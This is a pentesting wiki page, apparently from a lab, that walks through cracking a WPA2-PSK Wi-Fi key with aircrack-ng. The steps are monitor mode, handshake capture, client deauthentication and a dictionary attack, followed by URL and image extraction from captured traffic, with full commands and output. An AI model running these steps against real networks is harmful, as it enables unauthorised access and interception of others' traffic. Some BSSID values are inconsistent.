Difference between revisions of "WiFi Sniffing"
MMehlfuehrer (talk | contribs) |
|||
(33 intermediate revisions by one other user not shown) | |||
Line 2: | Line 2: | ||
Sniff Wi-Fi traffic using wireless interfaces supporting [https://en.wikipedia.org/wiki/Monitor_mode monitor mode] and [https://en.wikipedia.org/wiki/Packet_injection packet injection] (*). | Sniff Wi-Fi traffic using wireless interfaces supporting [https://en.wikipedia.org/wiki/Monitor_mode monitor mode] and [https://en.wikipedia.org/wiki/Packet_injection packet injection] (*). | ||
WPA/WPA2 uses various types | WPA/WPA2 uses various types of authentication. Aircrack-ng is only capable of cracking pre-shared keys! Meaning only networks using PSK can be attacked. (To determine if a network uses PSK, airodump-ng can be used). The method used to crack the pre-shared key is a plain brute force attack. This means the PSK needs to be in the dictionary used for the brute force attack. If it is not in the list, aircrack-ng can not determine the key. | ||
For WPA/WPA2 cracking the initial 4-way handshake is needed. This handshake is conducted between a client and the AP | For WPA/WPA2 cracking the initial 4-way handshake is needed. This handshake is conducted between a client and the AP when a client tries to connect to the network. | ||
== Requirements == | == Requirements == | ||
* Operating system: [https://www.kali.org/downloads/12/ Kali Linux 64 Bit] | * Operating system: [https://www.kali.org/downloads/12/ Kali Linux 64 Bit] | ||
* Wireless card: One that can inject packets [https://www.aircrack-ng.org/doku.php?id=injection_test Injection test] | |||
* | |||
== Prerequisites== | |||
The following information of the hardware used is needed: | |||
*MAC of a wireless client in the network: 34:B2:0A:7D:17:77 | |||
*BSSID: 68:02:B8:1F:A1:3A | |||
*ESSID: WLAN18250073 | |||
*Channel used by AP: 11 | |||
*Wireless interface: wlan0mon | |||
== Description == | == Description == | ||
=== Overview === | |||
The following steps are needed to get the password: | |||
1) Use monitor mode on the wireless interface using the AP channel | |||
2) Using airodump-ng on AP channel, collecting needed handshake | |||
3) Use aireplay-ng to deauthenticate a wireless client in the network | |||
4) Use aircrack-ng to crack the key using the collected handshake | |||
=== Step 1 - Use monitor mode on the wireless interface using the AP channel === | |||
To listen to every packet in the air the wireless card needs to be in monitor mode. If a wireless card is not in monitor mode it will only catch every packet addressed to itself. When listening to every packet send an attacker eventually captures a 4-way handshake used to crack WPA/WPA2. Additionally, one can deauthenticate wireless clients, explained in a later step. | |||
Depending on the driver used by the card, different methods need to be used to enable monitor mode. This tutorial only shows the procedure for the madwifi-ng driver, for further information look at [https://www.aircrack-ng.org/doku.php?id=cracking_wpa aircrack-ng]'s tutorial | |||
Open a terminal and type : | |||
airmon-ng | |||
to determine the driver your card is using. The output with a wireless card from Atheros is the following: | |||
PHY Interface Driver Chipset | |||
phy0 wlan0 ath9k_htc Qualcomm Atheros Communications AR9271 802.11n | |||
The next step is to switch to monitor mode. Syntax: airmon-ng start <interface> <channel used by AP>. Because we don't know the used channel from the AP we only start the monitoring mode without a specific channel: | |||
airmon-ng start wlan0 | |||
Output: | |||
Found 2 processes that could cause trouble. | |||
Kill them using 'airmon-ng check kill' before putting | |||
the card in monitor mode, they will interfere by changing channels | |||
and sometimes putting the interface back in managed mode | |||
PID Name | |||
605 NetworkManager | |||
2948 wpa_supplicant | |||
PHY Interface Driver Chipset | |||
phy0 wlan0mon ath9k_htc Qualcomm Atheros Communications AR9271 802.11n | |||
(mac80211 monitor mode already enabled for [phy0]wlan0mon on [phy0]wlan0mon) | |||
Now we can check if the interface is in monitor mode using iwconfig: | |||
iwconfig | iwconfig | ||
lo no wireless extensions. | |||
eth0 no wireless extensions. | |||
tun0 no wireless extensions. | |||
wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm | |||
Retry short limit:7 RTS thr:off Fragment thr:off | |||
Power Management:off | |||
As we can see the interface changed the name from wlan0 to wlan0mon and uses the monitor mode. With airodump-ng <interface> we can monitor all AP's within reach. | |||
airodump-ng wlan0mon | |||
The output presented shows all AP's with information like ESSUD, BSSID, PWR, beacons, channels, encryption, cipher, and authentication methods used | |||
CH 4 ][ Elapsed: 1 min ][ 2021-12-17 10:40 | |||
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID | |||
68:02:B8:1F:A1:3A -50 46 31 0 11 130 WPA2 CCMP PSK WLAN18250073 | |||
Important for the further attack is the BSSID (69:02:B8:1F:A1:3A) and the used channel (11). | |||
=== Step 2 - Using airodump-ng on AP channel, collecting needed handshake === | |||
Now we got the BSSID and channel of the AP we can start capturing the 4-way handshake. With the command airodump-ng -c <channel> --bssid <bssid> -w <filename> <interface> | |||
airodump-ng -c 11 --bssid 68:02:B8:1F:A1:3A -w CapturedData wlan0mon | |||
Output: | |||
CH 11 ][ Elapsed: 12 s ][ 2021-12-17 11:38 4-Way Handshake CAPTURED | |||
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID | |||
68:02:B8:1F:A1:3A -48 24 63 62 2 11 130 WPA2 CCMP PSK WLAN18250073 | |||
BSSID STATION PWR Rate Lost Frames Notes Probes | |||
68:02:B8:1F:A1:3A 5C:5F:67:29:51:76 -18 0e- 0e 3 62 | |||
68:02:B8:1F:A1:3A 66:60:B5:63:1F:B9 -58 0 - 1 0 2 | |||
Note: | |||
In the top right corner, it says 4-way Handshake CAPTURED. This is just a placeholder edited in. Nothing is stated there until a handshake is captured. When captured it says: [WPA handshake: 68:02:B8:1F:A1:3A.# | |||
Now the tool starts collecting every packet from this AP. It can take quite a while until a 4-way handshake is made. Step 3 helps to speed things up. | |||
=== Step 3 - Use aireplay-ng to deauthenticate a wireless client in the network === | |||
A faster way to capture the 4-way handshake is to connect with an additional client to the wireless network manually. When connecting to the new network, the AP starts the 4-way handshake. Because this is impractical an attacker can deauthenticate clients already connected to a WiFi network to reinitialize the 4-way handshake. BSSID and MAC of the device to deauthenticate are needed to conduct the attack. | |||
Deauthenication is started with aireplay-ng -0 <number of deauths to send> -a <BSSID> -c <MAC of client> <interface>. | |||
It is important to state, that while a client is deauthenticated the tool used in Step 2 still needs to be running to capture the packets! | |||
aireplay-ng -0 10 -a 69:02:B8:1F:A1:3A -c 34:B2:0A:7D:17:77 wlan0mon | |||
the output: | |||
11:21:15 Waiting for beacon frame (BSSID: 68:02:B8:1F:A1:3A) on channel 11 | |||
11:21:16 Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|63 ACKs] | |||
11:21:17 Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|54 ACKs] | |||
11:21:17 Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|59 ACKs] | |||
11:21:18 Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|73 ACKs] | |||
11:21:19 Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|61 ACKs] | |||
11:21:20 Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|52 ACKs] | |||
11:21:20 Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|65 ACKs] | |||
11:21:21 Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|60 ACKs] | |||
11:21:22 Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|63 ACKs] | |||
11:21:22 Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|66 ACKs] | |||
=== Step 4 - Use aircrack-ng to crack the key using the collected handshake === | |||
In this step, the captured 4-way handshake is used to crack the pre-shared key. The captured data is stored in a file called CapturedData (used in Step 2: -w CapturedData). | |||
One can use a dictionary which comes with aircrack-ng called "password.lst". Using the command: | |||
aircrack-ng -w password.lst -b 69:02:B8:1F:A1:3A CapturedData*.cap | |||
-w password.lst is the used dictionary | |||
-b is the BSSID of the AP | |||
The wildcard at the end of CapturedData is because aircrack-ng created multiple files | |||
The output looks as follows: | |||
[00:00:00] 2 keys tested (36.20 k/s) | |||
KEY FOUND! [ AKITs1!] | |||
Master Key : <Master Key> | |||
Transcient Key : <Transcient Key> | |||
--------------------------------------------------------------- | |||
Filter URLs from captured traffic: | Filter URLs from captured traffic: | ||
Line 108: | Line 213: | ||
* https://www.aircrack-ng.org/doku.php?id=airmon-ng | * https://www.aircrack-ng.org/doku.php?id=airmon-ng | ||
* https://www.aircrack-ng.org/doku.php?id=airodump-ng | * https://www.aircrack-ng.org/doku.php?id=airodump-ng | ||
* https://www.aircrack-ng.org/doku.php?id=injection_test | |||
* https://www.aircrack-ng.org/doku.php?id=cracking_wpa | |||
[[Category:Documentation]] | [[Category:Documentation]] | ||
[[Category:Pentesting]] |
Latest revision as of 17:45, 12 March 2024
Summary
Sniff Wi-Fi traffic using wireless interfaces supporting monitor mode and packet injection (*). WPA/WPA2 uses various types of authentication. Aircrack-ng is only capable of cracking pre-shared keys! Meaning only networks using PSK can be attacked. (To determine if a network uses PSK, airodump-ng can be used). The method used to crack the pre-shared key is a plain brute force attack. This means the PSK needs to be in the dictionary used for the brute force attack. If it is not in the list, aircrack-ng can not determine the key. For WPA/WPA2 cracking the initial 4-way handshake is needed. This handshake is conducted between a client and the AP when a client tries to connect to the network.
Requirements
- Operating system: Kali Linux 64 Bit
- Wireless card: One that can inject packets Injection test
Prerequisites
The following information of the hardware used is needed:
- MAC of a wireless client in the network: 34:B2:0A:7D:17:77
- BSSID: 68:02:B8:1F:A1:3A
- ESSID: WLAN18250073
- Channel used by AP: 11
- Wireless interface: wlan0mon
Description
Overview
The following steps are needed to get the password:
1) Use monitor mode on the wireless interface using the AP channel
2) Using airodump-ng on AP channel, collecting needed handshake
3) Use aireplay-ng to deauthenticate a wireless client in the network
4) Use aircrack-ng to crack the key using the collected handshake
Step 1 - Use monitor mode on the wireless interface using the AP channel
To listen to every packet in the air the wireless card needs to be in monitor mode. If a wireless card is not in monitor mode it will only catch every packet addressed to itself. When listening to every packet send an attacker eventually captures a 4-way handshake used to crack WPA/WPA2. Additionally, one can deauthenticate wireless clients, explained in a later step.
Depending on the driver used by the card, different methods need to be used to enable monitor mode. This tutorial only shows the procedure for the madwifi-ng driver, for further information look at aircrack-ng's tutorial
Open a terminal and type :
airmon-ng
to determine the driver your card is using. The output with a wireless card from Atheros is the following:
PHY Interface Driver Chipset phy0 wlan0 ath9k_htc Qualcomm Atheros Communications AR9271 802.11n
The next step is to switch to monitor mode. Syntax: airmon-ng start <interface> <channel used by AP>. Because we don't know the used channel from the AP we only start the monitoring mode without a specific channel:
airmon-ng start wlan0
Output:
Found 2 processes that could cause trouble. Kill them using 'airmon-ng check kill' before putting the card in monitor mode, they will interfere by changing channels and sometimes putting the interface back in managed mode PID Name 605 NetworkManager 2948 wpa_supplicant PHY Interface Driver Chipset phy0 wlan0mon ath9k_htc Qualcomm Atheros Communications AR9271 802.11n (mac80211 monitor mode already enabled for [phy0]wlan0mon on [phy0]wlan0mon)
Now we can check if the interface is in monitor mode using iwconfig:
iwconfig lo no wireless extensions. eth0 no wireless extensions. tun0 no wireless extensions. wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm Retry short limit:7 RTS thr:off Fragment thr:off Power Management:off
As we can see the interface changed the name from wlan0 to wlan0mon and uses the monitor mode. With airodump-ng <interface> we can monitor all AP's within reach.
airodump-ng wlan0mon
The output presented shows all AP's with information like ESSUD, BSSID, PWR, beacons, channels, encryption, cipher, and authentication methods used
CH 4 ][ Elapsed: 1 min ][ 2021-12-17 10:40 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 68:02:B8:1F:A1:3A -50 46 31 0 11 130 WPA2 CCMP PSK WLAN18250073
Important for the further attack is the BSSID (69:02:B8:1F:A1:3A) and the used channel (11).
Step 2 - Using airodump-ng on AP channel, collecting needed handshake
Now we got the BSSID and channel of the AP we can start capturing the 4-way handshake. With the command airodump-ng -c <channel> --bssid <bssid> -w <filename> <interface>
airodump-ng -c 11 --bssid 68:02:B8:1F:A1:3A -w CapturedData wlan0mon
Output:
CH 11 ][ Elapsed: 12 s ][ 2021-12-17 11:38 4-Way Handshake CAPTURED BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 68:02:B8:1F:A1:3A -48 24 63 62 2 11 130 WPA2 CCMP PSK WLAN18250073 BSSID STATION PWR Rate Lost Frames Notes Probes 68:02:B8:1F:A1:3A 5C:5F:67:29:51:76 -18 0e- 0e 3 62 68:02:B8:1F:A1:3A 66:60:B5:63:1F:B9 -58 0 - 1 0 2
Note: In the top right corner, it says 4-way Handshake CAPTURED. This is just a placeholder edited in. Nothing is stated there until a handshake is captured. When captured it says: [WPA handshake: 68:02:B8:1F:A1:3A.#
Now the tool starts collecting every packet from this AP. It can take quite a while until a 4-way handshake is made. Step 3 helps to speed things up.
Step 3 - Use aireplay-ng to deauthenticate a wireless client in the network
A faster way to capture the 4-way handshake is to connect with an additional client to the wireless network manually. When connecting to the new network, the AP starts the 4-way handshake. Because this is impractical an attacker can deauthenticate clients already connected to a WiFi network to reinitialize the 4-way handshake. BSSID and MAC of the device to deauthenticate are needed to conduct the attack. Deauthenication is started with aireplay-ng -0 <number of deauths to send> -a <BSSID> -c <MAC of client> <interface>. It is important to state, that while a client is deauthenticated the tool used in Step 2 still needs to be running to capture the packets!
aireplay-ng -0 10 -a 69:02:B8:1F:A1:3A -c 34:B2:0A:7D:17:77 wlan0mon
the output:
11:21:15 Waiting for beacon frame (BSSID: 68:02:B8:1F:A1:3A) on channel 11 11:21:16 Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|63 ACKs] 11:21:17 Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|54 ACKs] 11:21:17 Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|59 ACKs] 11:21:18 Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|73 ACKs] 11:21:19 Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|61 ACKs] 11:21:20 Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|52 ACKs] 11:21:20 Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|65 ACKs] 11:21:21 Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|60 ACKs] 11:21:22 Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|63 ACKs] 11:21:22 Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|66 ACKs]
Step 4 - Use aircrack-ng to crack the key using the collected handshake
In this step, the captured 4-way handshake is used to crack the pre-shared key. The captured data is stored in a file called CapturedData (used in Step 2: -w CapturedData). One can use a dictionary which comes with aircrack-ng called "password.lst". Using the command:
aircrack-ng -w password.lst -b 69:02:B8:1F:A1:3A CapturedData*.cap
-w password.lst is the used dictionary -b is the BSSID of the AP The wildcard at the end of CapturedData is because aircrack-ng created multiple files
The output looks as follows:
[00:00:00] 2 keys tested (36.20 k/s) KEY FOUND! [ AKITs1!] Master Key : <Master Key> Transcient Key : <Transcient Key>
Filter URLs from captured traffic:
urlsnarf -p alfa-01.cap
Filter pictures from captured traffic:
driftnet -f alfa-01.cap -a -d Pictures/
Disable monitor mode:
airmon-ng stop wlan1mon
(*) Test if the adapter supports injection:
aireplay-ng -9 wlan1mon
Detailed information about wireless adapters available in ELVIS can be found here.
(**) This command did not work with ALFA NETWORK AWUS036ACH and ALFA NETWORK AWUS036EAC. The following commands are an alternative way to start monitor mode on the adapter:
ifconfig wlan1 down iwconfig wlan1 mode monitor ifconfig wlan1 up
Results
Browser | urlsnarf | driftnet |
---|---|---|
Microsoft Edge (Windows 10 host) | no results reading the pcap file | no results reading the pcap file |
Mozilla Firefox (Windows 10 host) | no results reading the pcap file | no results reading the pcap file |
Google Chrome (Windows 10 host) | no results reading the pcap file | no results reading the pcap file |
Google Chrome (Android host) | no results reading the pcap file | no results reading the pcap file |
Samsung Internet (Android host) | URLs captured | images captured |
Used Hardware
- Windows 10 host
- Kali Linux host
- Samsung Galaxy A8
- LG Nexus 5X Google Smartphone 32 GB, Android 6.0 Marshmallow, Carbon
- Panda 300 Mbps Wireless N USB Adapter PAU05
- Alfa AWUS036ACH Wide Range AC1200 Wireless Adapter
- Alfa AWUS036EAC AC1200 USB Wireless Adapter